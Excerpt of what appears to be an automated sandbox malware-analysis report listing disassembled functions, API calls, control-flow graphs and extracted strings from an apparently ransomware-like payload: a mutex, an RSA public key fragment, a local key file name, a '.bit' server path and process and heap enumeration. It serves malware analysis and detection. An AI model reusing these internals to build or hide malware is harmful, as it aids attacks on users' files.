                                                                                                                              • Part of subcall function 00E424E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00E424FE
                                                                                                                              • Part of subcall function 00E424E0: GetLastError.KERNEL32 ref: 00E42509
                                                                                                                              • Part of subcall function 00E424E0: CloseHandle.KERNEL32 ref: 00E4251C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                            • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2957410896-1622685476
                                                                                                                            • Opcode ID: ad5fef989ed410f83a46672a233de0c727af27062eef9eacd967edb45b1ec99d
                                                                                                                            • Instruction ID: 47cd5a80edc0ac7d8d897fe0c627b4157443f0761616d452d95c63f93aa14230
                                                                                                                            • Opcode Fuzzy Hash: ad5fef989ed410f83a46672a233de0c727af27062eef9eacd967edb45b1ec99d
                                                                                                                            • Instruction Fuzzy Hash: B7D2B0706043419BDB14EF34E845BABB7E5BF94304F54192CF585A7292EB71EA08CB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00EB1920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 606 eb1920-eb19e0 call e5f7c0 GetVersionExA LoadLibraryA * 3 609 eb1a0b-eb1a0d 606->609 610 eb19e2-eb1a05 GetProcAddress * 2 606->610 611 eb1aba-eb1ac2 609->611 612 eb1a13-eb1a15 609->612 610->609 613 eb1acb-eb1ad3 611->613 614 eb1ac4-eb1ac5 FreeLibrary 611->614 612->611 615 eb1a1b-eb1a31 NetStatisticsGet 612->615 616 eb1b0d 613->616 617 eb1ad5-eb1b0b GetProcAddress * 3 613->617 614->613 618 eb1a69-eb1a85 NetStatisticsGet 615->618 619 eb1a33-eb1a5d call e5f7c0 call e8d550 615->619 620 eb1b0f-eb1b17 616->620 617->620 618->611 622 eb1a87-eb1aae call e5f7c0 call e8d550 618->622 619->618 625 eb1c0a-eb1c12 620->625 626 eb1b1d-eb1b23 620->626 622->611 628 eb1c1b-eb1c22 625->628 629 eb1c14-eb1c15 FreeLibrary 625->629 626->625 631 eb1b29-eb1b2b 626->631 633 eb1c31-eb1c44 LoadLibraryA 628->633 634 eb1c24-eb1c2b call e849a0 628->634 629->628 631->625 636 eb1b31-eb1b47 631->636 639 eb1d4b-eb1d53 633->639 640 eb1c4a-eb1c82 GetProcAddress * 3 633->640 634->633 634->639 648 eb1b49-eb1b5d 636->648 649 eb1b98-eb1baa 636->649 642 eb1d59-eb1e56 GetProcAddress * 12 639->642 643 eb223f-eb2256 call eb2470 GlobalMemoryStatus call e5f7c0 639->643 644 eb1caf-eb1cb7 640->644 645 eb1c84 640->645 652 eb1e5c-eb1e63 642->652 653 eb2233-eb2239 FreeLibrary 642->653 668 eb225b-eb22cd call e8d550 GetCurrentProcessId call e5f7c0 call e8d550 call e5a77e 643->668 650 eb1cb9-eb1cc0 644->650 651 eb1d06-eb1d08 644->651 655 eb1c86-eb1cac call e5f7c0 call e8d550 645->655 670 eb1b8a-eb1b8c 648->670 671 eb1b5f-eb1b84 call e5f7c0 call e8d550 648->671 665 eb1bb2-eb1bb4 649->665 658 eb1ccb-eb1ccd 650->658 659 eb1cc2-eb1cc9 650->659 656 eb1d0a-eb1d3c call e5f7c0 call e8d550 651->656 657 eb1d3f-eb1d45 FreeLibrary 651->657 652->653 660 eb1e69-eb1e70 652->660 653->643 655->644 656->657 657->639 658->651 664 eb1ccf-eb1cde 658->664 659->651 659->658 660->653 666 eb1e76-eb1e7d 660->666 664->651 685 eb1ce0-eb1d03 call e5f7c0 call e8d550 664->685 665->625 673 eb1bb6-eb1bca 665->673 666->653 667 eb1e83-eb1e8a 666->667 667->653 674 eb1e90-eb1e97 667->674 670->649 671->670 687 eb1bfc-eb1bfe 673->687 688 eb1bcc-eb1bf6 call e5f7c0 call e8d550 673->688 674->653 680 eb1e9d-eb1ea4 674->680 680->653 689 eb1eaa-eb1eb1 680->689 685->651 687->625 688->687 689->653 695 eb1eb7-eb1ebe 689->695 695->653 702 eb1ec4-eb1ecb 695->702 702->653 706 eb1ed1-eb1ed3 702->706 706->653 709 eb1ed9-eb1eea CreateToolhelp32Snapshot 706->709 709->653 711 eb1ef0-eb1f01 709->711 713 eb1f03-eb1f0f GetTickCount 711->713 714 eb1f15-eb1f22 Heap32ListFirst 711->714 713->714 715 eb1f28-eb1f2d 714->715 716 eb2081-eb2093 714->716 719 eb1f33-eb1f9d call e5f7c0 call e8d550 Heap32First 715->719 717 eb209d-eb20b2 Process32First 716->717 718 eb2095-eb2097 GetTickCount 716->718 720 eb210a-eb2116 717->720 721 eb20b4-eb20f5 call e5f7c0 call e8d550 717->721 718->717 734 eb1f9f-eb1faa 719->734 735 eb2015-eb2060 Heap32ListNext 719->735 724 eb2118-eb211a GetTickCount 720->724 725 eb2120-eb2135 720->725 721->720 748 eb20f7-eb20f9 721->748 724->725 732 eb2137 725->732 733 eb2196-eb21a2 725->733 737 eb2140-eb2181 call e5f7c0 call e8d550 732->737 739 eb21ac-eb21c1 733->739 740 eb21a4-eb21a6 GetTickCount 733->740 738 eb1fb0-eb1feb call e5f7c0 call e8d550 Heap32Next 734->738 735->716 745 eb2062-eb2064 735->745 737->733 771 eb2183-eb2185 737->771 763 eb200f 738->763 764 eb1fed-eb1fef 738->764 752 eb2219-eb2227 739->752 753 eb21c3-eb2204 call e5f7c0 call e8d550 739->753 740->739 749 eb2079-eb207b 745->749 750 eb2066-eb2077 GetTickCount 745->750 748->721 756 eb20fb-eb2108 GetTickCount 748->756 749->716 749->719 750->716 750->749 760 eb2229-eb222b 752->760 761 eb222d CloseHandle 752->761 753->752 774 eb2206-eb2208 753->774 756->720 756->721 760->653 761->653 763->735 767 eb1ff1-eb2002 GetTickCount 764->767 768 eb2004-eb200d 764->768 767->763 767->768 768->738 768->763 771->737 772 eb2187-eb2194 GetTickCount 771->772 772->733 772->737 774->753 775 eb220a-eb2217 GetTickCount 774->775 775->752 775->753
                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 00EB1983
                                                                                                                            • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00EB1994
                                                                                                                            • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00EB19A1
                                                                                                                            • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00EB19AE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00EB19E8
                                                                                                                            • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00EB19FB
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00EB1A2D
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00EB1A81
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00EB1AC5
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00EB1ADB
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00EB1AEE
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00EB1B01
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00EB1C15
                                                                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00EB1C36
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00EB1C50
                                                                                                                            • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00EB1C63
                                                                                                                            • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00EB1C76
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00EB1D45
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00EB1D73
                                                                                                                            • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00EB1D86
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32First), ref: 00EB1D99
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00EB1DAC
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00EB1DBF
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00EB1DD2
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32First), ref: 00EB1DE5
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32Next), ref: 00EB1DF8
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32First), ref: 00EB1E0B
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00EB1E1E
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32First), ref: 00EB1E31
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32Next), ref: 00EB1E44
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00EB1EDD
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB1F03
                                                                                                                            • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00EB1F1A
                                                                                                                            • Heap32First.KERNEL32(00000024,?,?), ref: 00EB1F95
                                                                                                                            • Heap32Next.KERNEL32(?,?,?,?,?,B5D9D8E5), ref: 00EB1FE3
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB1FF1
                                                                                                                            • Heap32ListNext.KERNEL32(?,?), ref: 00EB2058
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2066
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2095
                                                                                                                            • Process32First.KERNEL32(?,00000128), ref: 00EB20AA
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB20FB
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2118
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2187
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB21A4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                            • API String ID: 4174345323-1723836103
                                                                                                                            • Opcode ID: 11e3a43bb64c85e05c7090cafbde5917df8622e0f52f71ded5e6fd118456d35d
                                                                                                                            • Instruction ID: 0f98187f848b3ef3930c2363afdddd828f659c90531abac5bedc63c841d29e6f
                                                                                                                            • Opcode Fuzzy Hash: 11e3a43bb64c85e05c7090cafbde5917df8622e0f52f71ded5e6fd118456d35d
                                                                                                                            • Instruction Fuzzy Hash: 74323EB0E402299ADB219F68CC45BEEB6B9FF45705F0051EAE60CF6191EB708E84CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 776 e4e690-e4e6d8 call e5f7c0 timeGetTime call e53f74 call e3c6a0 783 e4e6e0-e4e6e6 776->783 784 e4e6f0-e4e722 call e5b420 call e3c500 783->784 789 e4e724-e4e729 784->789 790 e4e72e-e4e772 InternetOpenW 784->790 791 e4ea1f-e4ea40 call e53cf0 789->791 792 e4e774-e4e776 790->792 793 e4e778-e4e77d 790->793 800 e4ea42-e4ea46 791->800 801 e4ea8d-e4eacc lstrlenA lstrcpyA * 2 lstrlenA 791->801 795 e4e78f-e4e7b8 call e45ae0 call e51c02 792->795 796 e4e780-e4e789 793->796 816 e4e882-e4e8e5 call e45ae0 call e43ff0 call e42900 call e459d0 795->816 817 e4e7be-e4e7f7 call e44690 call e3dd40 795->817 796->796 798 e4e78b-e4e78d 796->798 798->795 803 e4ea4c-e4ea61 SHGetFolderPathA 800->803 804 e4ee2a call e41b10 800->804 805 e4eace 801->805 806 e4eaef-e4eb12 801->806 803->784 808 e4ea67-e4ea88 PathAppendA DeleteFileA 803->808 818 e4ee2f-e4ee3a 804->818 809 e4ead0-e4ead8 805->809 812 e4eb14-e4eb16 806->812 813 e4eb18-e4eb1f 806->813 808->784 814 e4eada-e4eae7 lstrlenA 809->814 815 e4eaeb 809->815 819 e4eb2b-e4eb4f call e456d0 call e42900 812->819 820 e4eb22-e4eb27 813->820 814->809 824 e4eae9 814->824 815->806 873 e4e8e7-e4e8f0 call e52587 816->873 874 e4e8f3-e4e917 lstrcpyW 816->874 840 e4e86f-e4e874 817->840 841 e4e7f9-e4e7fe 817->841 826 e4ee3c-e4ee3f 818->826 827 e4ee4d-e4ee82 call e3ef50 818->827 845 e4eb51 819->845 846 e4eb53-e4eb66 lstrcpyW 819->846 820->820 822 e4eb29 820->822 822->819 824->806 826->783 837 e4ee86-e4ee8c 827->837 843 e4ee92-e4ee94 837->843 844 e4ee8e-e4ee90 837->844 840->816 854 e4e876-e4e87f call e52587 840->854 847 e4e800-e4e809 call e52587 841->847 848 e4e80c-e4e827 841->848 851 e4ee97-e4ee9c 843->851 850 e4eea0-e4eeaf call e43ea0 844->850 845->846 852 e4eb74-e4ebe4 lstrlenA call e50c62 call e5b420 MultiByteToWideChar lstrcpyW call e53cf0 846->852 853 e4eb68-e4eb71 call e52587 846->853 847->848 856 e4e842-e4e848 848->856 857 e4e829-e4e82d 848->857 850->837 875 e4eeb1-e4eee3 call e3ef50 850->875 851->851 859 e4ee9e 851->859 897 e4ebe6-e4ebea 852->897 898 e4ec3d-e4ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 852->898 853->852 854->816 865 e4e84e-e4e86c 856->865 857->865 866 e4e82f-e4e840 call e505a0 857->866 859->850 865->840 866->865 873->874 879 e4e943-e4e97a InternetOpenUrlW InternetReadFile 874->879 880 e4e919-e4e920 874->880 895 e4eee7-e4eeed 875->895 884 e4e9ec-e4ea08 InternetCloseHandle * 2 879->884 885 e4e97c-e4e994 SHGetFolderPathA 879->885 880->879 887 e4e922-e4e92e 880->887 891 e4ea16-e4ea19 884->891 892 e4ea0a-e4ea13 call e52587 884->892 885->884 890 e4e996-e4e9c2 PathAppendA call e520b6 885->890 893 e4e937 887->893 894 e4e930-e4e935 887->894 890->884 913 e4e9c4-e4e9e9 lstrlenA call e52b02 call e53a38 890->913 891->791 892->891 896 e4e93c-e4e93d lstrcatW 893->896 894->896 901 e4eef3-e4eef5 895->901 902 e4eeef-e4eef1 895->902 896->879 897->804 905 e4ebf0-e4ec11 SHGetFolderPathA 897->905 907 e4ecbf-e4ecdd 898->907 908 e4ec99 898->908 904 e4eef8-e4eefd 901->904 903 e4ef01-e4ef10 call e43ea0 902->903 903->895 924 e4ef12-e4ef4c call e43ff0 call e42900 903->924 904->904 910 e4eeff 904->910 905->784 912 e4ec17-e4ec38 PathAppendA DeleteFileA 905->912 915 e4ece3-e4eced 907->915 916 e4ecdf-e4ece1 907->916 914 e4eca0-e4eca8 908->914 910->903 912->783 913->884 919 e4ecaa-e4ecb7 lstrlenA 914->919 920 e4ecbb 914->920 922 e4ecf0-e4ecf5 915->922 921 e4ecf9-e4ed1b call e456d0 call e42900 916->921 919->914 926 e4ecb9 919->926 920->907 936 e4ed1d 921->936 937 e4ed1f-e4ed35 lstrcpyW 921->937 922->922 927 e4ecf7 922->927 941 e4ef50-e4ef68 lstrcpyW 924->941 942 e4ef4e 924->942 926->907 927->921 936->937 939 e4ed37-e4ed40 call e52587 937->939 940 e4ed43-e4edab lstrlenA call e50c62 call e5b420 MultiByteToWideChar lstrcpyW lstrlenW 937->940 939->940 957 e4edbc-e4edc1 940->957 958 e4edad-e4edb6 lstrlenW 940->958 945 e4ef76-e4efb3 call e43ff0 call e42900 941->945 946 e4ef6a-e4ef73 call e52587 941->946 942->941 962 e4efb5 945->962 963 e4efb7-e4efc6 lstrcpyW 945->963 946->945 960 e4ee10-e4ee12 957->960 961 e4edc3-e4ede4 SHGetFolderPathA 957->961 958->957 959 e4ee44-e4ee48 958->959 964 e4f01a-e4f030 959->964 966 e4ee14-e4ee1a call e50bed 960->966 967 e4ee1d-e4ee1f 960->967 961->784 965 e4edea-e4ee0b PathAppendA DeleteFileA 961->965 962->963 968 e4efd4-e4efe0 963->968 969 e4efc8-e4efd1 call e52587 963->969 965->783 966->967 967->804 971 e4ee21-e4ee27 call e50bed 967->971 973 e4efe2-e4efeb call e52587 968->973 974 e4efee-e4f008 968->974 969->968 971->804 973->974 979 e4f016 974->979 980 e4f00a-e4f013 call e52587 974->980 979->964 980->979
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,?,00EFB3EC,000000FF), ref: 00E4E6C0
                                                                                                                              • Part of subcall function 00E3C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00E4E6D4), ref: 00E3C6C2
                                                                                                                              • Part of subcall function 00E3C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00E3C6F3
                                                                                                                              • Part of subcall function 00E3C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00E3C700
                                                                                                                            • _memset.LIBCMT ref: 00E4E707
                                                                                                                              • Part of subcall function 00E3C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E3C51B
                                                                                                                            • InternetOpenW.WININET ref: 00E4E743
                                                                                                                            • _wcsstr.LIBCMT ref: 00E4E7AE
                                                                                                                            • _memmove.LIBCMT ref: 00E4E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00E4E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 00E4E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E4E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E4E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00E4E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00E4EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 00E4EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EB7C
                                                                                                                            • _malloc.LIBCMT ref: 00E4EB86
                                                                                                                            • _memset.LIBCMT ref: 00E4EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00E4EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EBB6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EC32
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E4EC3E
                                                                                                                            • lstrlenA.KERNEL32(","id":"), ref: 00E4EC51
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EC6D
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EC7F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EC93
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 00E4ECB3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4ED2A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4ED4B
                                                                                                                            • _malloc.LIBCMT ref: 00E4ED55
                                                                                                                            • _memset.LIBCMT ref: 00E4ED63
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00E4ED7D
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4ED85
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E4EDA3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E4EDAE
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EDD3
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EDF7
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EE05
                                                                                                                            • _free.LIBCMT ref: 00E4EE15
                                                                                                                            • _free.LIBCMT ref: 00E4EE22
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EF61
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EFBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                            • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 704684250-3586605218
                                                                                                                            • Opcode ID: ebec0647713f53d373855c534a07ab4f12aae95edf03d7755ab3a9d00b5e816f
                                                                                                                            • Instruction ID: a055521f942bcb516a6f158d5f96e7d4a5c976c6d952a2d2e9a3176d99669964
                                                                                                                            • Opcode Fuzzy Hash: ebec0647713f53d373855c534a07ab4f12aae95edf03d7755ab3a9d00b5e816f
                                                                                                                            • Instruction Fuzzy Hash: 2942E571508344AFDB20DF24EC49BABBBE8BF85304F14195DF585A7292DB70E509CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E40FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00E41010
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E41026
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E4103B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E41051
                                                                                                                            • lstrlenA.KERNEL32(?,00000000), ref: 00E41059
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00E41064
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E4107A
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00E41099
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E410AB
